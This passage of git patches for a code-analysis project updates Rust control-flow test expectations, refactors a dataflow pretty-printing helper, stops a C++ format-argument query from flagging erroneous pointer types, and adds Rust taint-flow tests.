...::First(...) | variables.rs:209:29:209:30 | a5 | match | -| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:35:209:57 | ...::Second(...) | no-match | -| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | ...::Third(...) | no-match | +| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:29:209:30 | a5 | match | +| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:35:209:57 | TupleStructPat | no-match | +| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | TupleStructPat | no-match | | variables.rs:209:10:209:57 | [match(true)] ... \| ... | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:209:29:209:30 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | -| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:55:209:56 | a5 | match | +| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | +| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:55:209:56 | a5 | match | | variables.rs:209:55:209:56 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:62:209:83 | ...::Third(...) | variables.rs:209:81:209:82 | a5 | match | +| variables.rs:209:62:209:83 | TupleStructPat | variables.rs:209:81:209:82 | a5 | match | | variables.rs:209:81:209:82 | a5 | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:210:16:210:24 | print_i64 | variables.rs:210:26:210:27 | a5 | | | variables.rs:210:16:210:28 | print_i64(...) | variables.rs:208:5:211:5 | match tv { ... } | | | variables.rs:210:26:210:27 | a5 | variables.rs:210:16:210:28 | print_i64(...) | | | variables.rs:212:5:215:5 | match tv { ... } | variables.rs:202:21:216:1 | { ... } | | -| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | ...::First(...) | | -| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:28:213:29 | a6 | match | -| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:35:213:57 | ...::Second(...) | no-match | +| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | TupleStructPat | | +| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:28:213:29 | a6 | match | +| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:35:213:57 | TupleStructPat | no-match | | variables.rs:213:9:213:83 | [match(true)] ... \| ... | variables.rs:214:16:214:24 | print_i64 | match | | variables.rs:213:28:213:29 | a6 | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | -| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:55:213:56 | a6 | match | -| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:61:213:82 | ...::Third(...) | no-match | +| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:55:213:56 | a6 | match | +| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:61:213:82 | TupleStructPat | no-match | | variables.rs:213:35:213:82 | [match(true)] ... \| ... | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | | variables.rs:213:55:213:56 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | -| variables.rs:213:61:213:82 | ...::Third(...) | variables.rs:213:80:213:81 | a6 | match | +| variables.rs:213:61:213:82 | TupleStructPat | variables.rs:213:80:213:81 | a6 | match | | variables.rs:213:80:213:81 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | | variables.rs:214:16:214:24 | print_i64 | variables.rs:214:26:214:27 | a6 | | | variables.rs:214:16:214:28 | print_i64(...) | variables.rs:212:5:215:5 | match tv { ... } | | @@ -478,14 +478,14 @@ edges | variables.rs:219:18:219:33 | ...::Left(...) | variables.rs:219:9:219:14 | either | | | variables.rs:219:31:219:32 | 32 | variables.rs:219:18:219:33 | ...::Left(...) | | | variables.rs:220:5:225:5 | match either { ... } | variables.rs:218:21:226:1 | { ... } | | -| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | ...::Left(...) | | -| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:22:221:23 | a7 | match | -| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:28:221:44 | ...::Right(...) | no-match | +| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | TupleStructPat | | +| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:22:221:23 | a7 | match | +| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:28:221:44 | TupleStructPat | no-match | | variables.rs:221:9:221:44 | [match(false)] ... \| ... | variables.rs:224:9:224:9 | _ | no-match | | variables.rs:221:9:221:44 | [match(true)] ... \| ... | variables.rs:222:16:222:17 | a7 | match | | variables.rs:221:22:221:23 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | -| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | -| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:42:221:43 | a7 | match | +| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | +| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:42:221:43 | a7 | match | | variables.rs:221:42:221:43 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | | variables.rs:222:16:222:17 | a7 | variables.rs:222:21:222:21 | 0 | | | variables.rs:222:16:222:21 | ... > ... | variables.rs:223:16:223:24 | print_i64 | true | @@ -505,15 +505,15 @@ edges | variables.rs:229:18:229:33 | ...::Left(...) | variables.rs:229:9:229:14 | either | | | variables.rs:229:31:229:32 | 32 | variables.rs:229:18:229:33 | ...::Left(...) | | | variables.rs:231:5:242:5 | match either { ... } | variables.rs:228:21:243:1 | { ... } | | -| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | ...::Left(...) | | +| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | TupleStructPat | | | variables.rs:232:9:233:52 | [match(true)] e | variables.rs:235:13:235:27 | ExprStmt | match | -| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:27:233:29 | a11 | match | -| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:34:233:51 | ...::Right(...) | no-match | +| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:27:233:29 | a11 | match | +| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:34:233:51 | TupleStructPat | no-match | | variables.rs:233:14:233:51 | [match(false)] ... \| ... | variables.rs:241:9:241:9 | _ | no-match | | variables.rs:233:14:233:51 | [match(true)] ... \| ... | variables.rs:232:9:233:52 | [match(true)] e | match | | variables.rs:233:27:233:29 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | -| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | -| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:48:233:50 | a11 | match | +| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | +| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:48:233:50 | a11 | match | | variables.rs:233:48:233:50 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | | variables.rs:234:12:240:9 | { ... } | variables.rs:231:5:242:5 | match either { ... } | | | variables.rs:235:13:235:21 | print_i64 | variables.rs:235:23:235:25 | a11 | | @@ -522,10 +522,10 @@ edges | variables.rs:235:23:235:25 | a11 | variables.rs:235:13:235:26 | print_i64(...) | | | variables.rs:236:13:239:13 | if ... {...} | variables.rs:234:12:240:9 | { ... } | | | variables.rs:236:16:237:15 | let ... = e | variables.rs:237:15:237:15 | e | | -| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:13:239:13 | if ... {...} | no-match | -| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:33:236:35 | a12 | match | +| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:13:239:13 | if ... {...} | no-match | +| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:33:236:35 | a12 | match | | variables.rs:236:33:236:35 | a12 | variables.rs:238:17:238:32 | ExprStmt | match | -| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | ...::Left(...) | | +| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | TupleStructPat | | | variables.rs:237:17:239:13 | { ... } | variables.rs:236:13:239:13 | if ... {...} | | | variables.rs:238:17:238:25 | print_i64 | variables.rs:238:28:238:30 | a12 | | | variables.rs:238:17:238:31 | print_i64(...) | variables.rs:237:17:239:13 | { ... } | | @@ -543,20 +543,20 @@ edges | variables.rs:253:14:253:35 | ...::Second(...) | variables.rs:253:9:253:10 | fv | | | variables.rs:253:33:253:34 | 62 | variables.rs:253:14:253:35 | ...::Second(...) | | | variables.rs:254:5:257:5 | match fv { ... } | variables.rs:252:21:258:1 | { ... } | | -| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | ...::First(...) | | -| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:27:255:29 | a13 | match | -| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:35:255:57 | ...::Second(...) | no-match | +| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | TupleStructPat | | +| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:27:255:29 | a13 | match | +| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:35:255:57 | TupleStructPat | no-match | | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | variables.rs:256:16:256:24 | print_i64 | match | | variables.rs:255:27:255:29 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | -| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:54:255:56 | a13 | match | -| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:61:255:82 | ...::Third(...) | no-match | -| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | ...::Fourth(...) | no-match | +| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:54:255:56 | a13 | match | +| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:61:255:82 | TupleStructPat | no-match | +| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | TupleStructPat | no-match | | variables.rs:255:35:255:82 | [match(true)] ... \| ... | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:255:54:255:56 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | -| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:79:255:81 | a13 | match | +| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | +| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:79:255:81 | a13 | match | | variables.rs:255:79:255:81 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:87:255:109 | ...::Fourth(...) | variables.rs:255:106:255:108 | a13 | match | +| variables.rs:255:87:255:109 | TupleStructPat | variables.rs:255:106:255:108 | a13 | match | | variables.rs:255:106:255:108 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:256:16:256:24 | print_i64 | variables.rs:256:26:256:28 | a13 | | | variables.rs:256:16:256:29 | print_i64(...) | variables.rs:254:5:257:5 | match fv { ... } | | @@ -582,14 +582,14 @@ edges | variables.rs:268:5:268:17 | print_str(...) | variables.rs:265:28:269:1 | { ... } | | | variables.rs:268:5:268:18 | ExprStmt | variables.rs:268:5:268:13 | print_str | | | variables.rs:268:15:268:16 | c1 | variables.rs:268:5:268:17 | print_str(...) | | -| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | ...::Left(...) | | +| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | TupleStructPat | | | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | variables.rs:271:1:275:1 | exit fn param_pattern2 | | | variables.rs:272:5:272:50 | ...: Either | variables.rs:274:5:274:18 | ExprStmt | | -| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:19:272:20 | a9 | match | -| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:25:272:41 | ...::Right(...) | no-match | +| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:19:272:20 | a9 | match | +| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:25:272:41 | TupleStructPat | no-match | | variables.rs:272:6:272:41 | [match(true)] ... \| ... | variables.rs:272:5:272:50 | ...: Either | match | | variables.rs:272:19:272:20 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | -| variables.rs:272:25:272:41 | ...::Right(...) | variables.rs:272:39:272:40 | a9 | match | +| variables.rs:272:25:272:41 | TupleStructPat | variables.rs:272:39:272:40 | a9 | match | | variables.rs:272:39:272:40 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | | variables.rs:273:9:275:1 | { ... } | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | | | variables.rs:274:5:274:13 | print_i64 | variables.rs:274:15:274:16 | a9 | | From c187a7ad340a23584dc5d973de7d59bb044e30d9 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Wed, 4 Dec 2024 11:04:49 +0100 Subject: [PATCH 0788/1267] Dataflow: Address review comments. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 24 +++++++------------ 1 file changed, 9 insertions(+), 15 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 6c91017ee8a..313934378c6 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1423,6 +1423,12 @@ module MakeImpl Lang> { private class TypOption = TypOption::Option; + private string ppStored(TypOption stored) { + exists(string ppt | ppt = stored.toString() | + if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt + ) + } + /* Begin: Stage logic. */ pragma[nomagic] private Typ getNodeTyp(NodeEx node) { @@ -1604,14 +1610,8 @@ module MakeImpl Lang> { private string ppTyp() { result = t.toString() and result != "" } - private string ppStored() { - exists(string ppt | ppt = stored.toString() | - if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt - ) - } - override string toString() { - result = p + concat(" : " + this.ppTyp()) + " " + ap + this.ppStored() + result = p + concat(" : " + this.ppTyp()) + " " + ap + ppStored(stored) } override Location getLocation() { result = p.getLocation() } @@ -3050,12 +3050,6 @@ module MakeImpl Lang> { ) } - private string ppStored() { - exists(string ppt | ppt = stored.toString() | - if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt - ) - } - private string ppCtx() { result = " <" + cc + ">" } private string ppSummaryCtx() { @@ -3066,7 +3060,7 @@ module MakeImpl Lang> { } override string toString() { - result = node.toString() + this.ppType() + this.ppAp() + this.ppStored() + result = node.toString() + this.ppType() + this.ppAp() + ppStored(stored) } /** @@ -3075,7 +3069,7 @@ module MakeImpl Lang> { */ string toStringWithContext() { result = - node.toString() + this.ppType() + this.ppAp() + this.ppStored() + this.ppCtx() + + node.toString() + this.ppType() + this.ppAp() + ppStored(stored) + this.ppCtx() + this.ppSummaryCtx() } From 19424020c372f284e7595e3ffbf93341533acf38 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Wed, 4 Dec 2024 10:57:15 +0000 Subject: [PATCH 0789/1267] C++: Test for erroneous string types --- .../Buildless/WrongTypeFormatArguments.expected | 1 + .../Format/WrongTypeFormatArguments/Buildless/tests.c | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected index 745f2f790f7..8ff4f02d4d6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected @@ -1 +1,2 @@ | tests.c:7:18:7:18 | 1 | This format specifier for type 'char *' does not match the argument type 'int'. | +| tests.c:11:18:11:20 | str | This format specifier for type 'char *' does not match the argument type ' *'. | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c index 81698c497c5..175d2f23182 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c @@ -3,9 +3,10 @@ int printf(const char * format, ...); int fprintf(); -void f() { +void f(UNKNOWN_CHAR * str) { printf("%s", 1); // BAD printf("%s", implicit_function()); // GOOD - we should ignore the type sprintf(0, "%s", ""); // GOOD fprintf(0, "%s", ""); // GOOD + printf("%s", str); // GOOD - erroneous type is ignored } From 28c5187a3c6505593635b3262e69ca486d87a8d5 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Wed, 4 Dec 2024 11:02:19 +0000 Subject: [PATCH 0790/1267] C++: Remove FPs in cpp/wrong-type-format-argument when string type is an error --- cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql | 4 ++++ .../Buildless/WrongTypeFormatArguments.expected | 1 - 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql index 027f4caa8ae..905c4307ad1 100644 --- a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql +++ b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql @@ -171,6 +171,10 @@ where not arg.isAffectedByMacro() and not arg.isFromUninstantiatedTemplate(_) and not actual.getUnspecifiedType() instanceof ErroneousType and + not ( + expected instanceof PointerType and + actual.getUnspecifiedType().(PointerType).getBaseType() instanceof ErroneousType + ) and not arg.(Call).mayBeFromImplicitlyDeclaredFunction() select arg, "This format specifier for type '" + expected.getName() + "' does not match the argument type '" + diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected index 8ff4f02d4d6..745f2f790f7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected @@ -1,2 +1 @@ | tests.c:7:18:7:18 | 1 | This format specifier for type 'char *' does not match the argument type 'int'. | -| tests.c:11:18:11:20 | str | This format specifier for type 'char *' does not match the argument type ' *'. | From f10ffa39e46403f6d401c4a0dc41e244116c0559 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 12:54:36 +0100 Subject: [PATCH 0791/1267] Rust: Add tests for taint flow --- .../library-tests/dataflow/models/main.rs | 10 ++ .../dataflow/models/models.expected | 138 ++++++++++++------ .../library-tests/dataflow/models/models.ql | 12 +- .../dataflow/taint/inline-taint-flow.expected | 6 + .../dataflow/taint/inline-taint-flow.ql | 12 ++ .../test/library-tests/dataflow/taint/main.rs | 31 ++++ 6 files changed, 164 insertions(+), 45 deletions(-) create mode 100644 rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected create mode 100644 rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql create mode 100644 rust/ql/test/library-tests/dataflow/taint/main.rs diff --git a/rust/ql/test/library-tests/dataflow/models/main.rs b/rust/ql/test/library-tests/dataflow/models/main.rs index 21cfc10ad2f..899736aec65 100644 --- a/rust/ql/test/library-tests/dataflow/models/main.rs +++ b/rust/ql/test/library-tests/dataflow/models/main.rs @@ -16,6 +16,16 @@ fn test_identify() { sink(identity(s)); // $ hasValueFlow=1 } +// has a flow model +fn coerce(_i: i64) -> i64 { + 0 +} + +fn test_coerce() { + let s = source(14); + sink(coerce(s)); // $ MISSING: hasTaintFlow=14 +} + enum MyPosEnum { A(i64), B(i64), diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index eeb9301b434..3aea90c7fb3 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected @@ -1,57 +1,107 @@ models edges | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | +| main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | | main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | -| main.rs:30:13:30:21 | source(...) | main.rs:31:27:31:27 | s | provenance | | -| main.rs:31:14:31:28 | ...::A(...) [A] | main.rs:32:22:32:23 | e1 [A] | provenance | | -| main.rs:31:27:31:27 | s | main.rs:31:14:31:28 | ...::A(...) [A] | provenance | | -| main.rs:32:22:32:23 | e1 [A] | main.rs:32:10:32:24 | get_var_pos(...) | provenance | | -| main.rs:43:13:43:21 | source(...) | main.rs:44:26:44:26 | s | provenance | | -| main.rs:44:14:44:27 | set_var_pos(...) [B] | main.rs:47:9:47:23 | ...::B(...) [B] | provenance | | -| main.rs:44:26:44:26 | s | main.rs:44:14:44:27 | set_var_pos(...) [B] | provenance | | -| main.rs:47:9:47:23 | ...::B(...) [B] | main.rs:47:22:47:22 | i | provenance | | -| main.rs:47:22:47:22 | i | main.rs:47:33:47:33 | i | provenance | | -| main.rs:62:13:62:21 | source(...) | main.rs:63:40:63:40 | s | provenance | | -| main.rs:63:14:63:42 | ...::C {...} [C] | main.rs:64:24:64:25 | e1 [C] | provenance | | -| main.rs:63:40:63:40 | s | main.rs:63:14:63:42 | ...::C {...} [C] | provenance | | -| main.rs:64:24:64:25 | e1 [C] | main.rs:64:10:64:26 | get_var_field(...) | provenance | | -| main.rs:75:13:75:21 | source(...) | main.rs:76:28:76:28 | s | provenance | | -| main.rs:76:14:76:29 | set_var_field(...) [D] | main.rs:79:9:79:37 | ...::D {...} [D] | provenance | | -| main.rs:76:28:76:28 | s | main.rs:76:14:76:29 | set_var_field(...) [D] | provenance | | -| main.rs:79:9:79:37 | ...::D {...} [D] | main.rs:79:35:79:35 | i | provenance | | -| main.rs:79:35:79:35 | i | main.rs:79:47:79:47 | i | provenance | | +| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | +| main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | +| main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | +| main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | +| main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | +| main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | +| main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | +| main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | +| main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | +| main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | +| main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | +| main.rs:57:22:57:22 | i | main.rs:57:33:57:33 | i | provenance | | +| main.rs:57:22:57:22 | i | main.rs:57:33:57:33 | i | provenance | | +| main.rs:72:13:72:21 | source(...) | main.rs:73:40:73:40 | s | provenance | | +| main.rs:72:13:72:21 | source(...) | main.rs:73:40:73:40 | s | provenance | | +| main.rs:73:14:73:42 | ...::C {...} [C] | main.rs:74:24:74:25 | e1 [C] | provenance | | +| main.rs:73:14:73:42 | ...::C {...} [C] | main.rs:74:24:74:25 | e1 [C] | provenance | | +| main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | +| main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | +| main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | +| main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | +| main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | +| main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | +| main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | +| main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | +| main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | +| main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | nodes | main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | +| main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | +| main.rs:16:10:16:20 | identity(...) | semmle.label | identity(...) | | main.rs:16:10:16:20 | identity(...) | semmle.label | identity(...) | | main.rs:16:19:16:19 | s | semmle.label | s | -| main.rs:30:13:30:21 | source(...) | semmle.label | source(...) | -| main.rs:31:14:31:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | -| main.rs:31:27:31:27 | s | semmle.label | s | -| main.rs:32:10:32:24 | get_var_pos(...) | semmle.label | get_var_pos(...) | -| main.rs:32:22:32:23 | e1 [A] | semmle.label | e1 [A] | -| main.rs:43:13:43:21 | source(...) | semmle.label | source(...) | -| main.rs:44:14:44:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | -| main.rs:44:26:44:26 | s | semmle.label | s | -| main.rs:47:9:47:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | -| main.rs:47:22:47:22 | i | semmle.label | i | -| main.rs:47:33:47:33 | i | semmle.label | i | -| main.rs:62:13:62:21 | source(...) | semmle.label | source(...) | -| main.rs:63:14:63:42 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | -| main.rs:63:40:63:40 | s | semmle.label | s | -| main.rs:64:10:64:26 | get_var_field(...) | semmle.label | get_var_field(...) | -| main.rs:64:24:64:25 | e1 [C] | semmle.label | e1 [C] | -| main.rs:75:13:75:21 | source(...) | semmle.label | source(...) | -| main.rs:76:14:76:29 | set_var_field(...) [D] | semmle.label | set_var_field(...) [D] | -| main.rs:76:28:76:28 | s | semmle.label | s | -| main.rs:79:9:79:37 | ...::D {...} [D] | semmle.label | ...::D {...} [D] | -| main.rs:79:35:79:35 | i | semmle.label | i | -| main.rs:79:47:79:47 | i | semmle.label | i | +| main.rs:16:19:16:19 | s | semmle.label | s | +| main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | +| main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | +| main.rs:41:14:41:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:41:14:41:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:41:27:41:27 | s | semmle.label | s | +| main.rs:41:27:41:27 | s | semmle.label | s | +| main.rs:42:10:42:24 | get_var_pos(...) | semmle.label | get_var_pos(...) | +| main.rs:42:10:42:24 | get_var_pos(...) | semmle.label | get_var_pos(...) | +| main.rs:42:22:42:23 | e1 [A] | semmle.label | e1 [A] | +| main.rs:42:22:42:23 | e1 [A] | semmle.label | e1 [A] | +| main.rs:53:13:53:21 | source(...) | semmle.label | source(...) | +| main.rs:53:13:53:21 | source(...) | semmle.label | source(...) | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | +| main.rs:54:26:54:26 | s | semmle.label | s | +| main.rs:54:26:54:26 | s | semmle.label | s | +| main.rs:57:9:57:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | +| main.rs:57:9:57:23 | 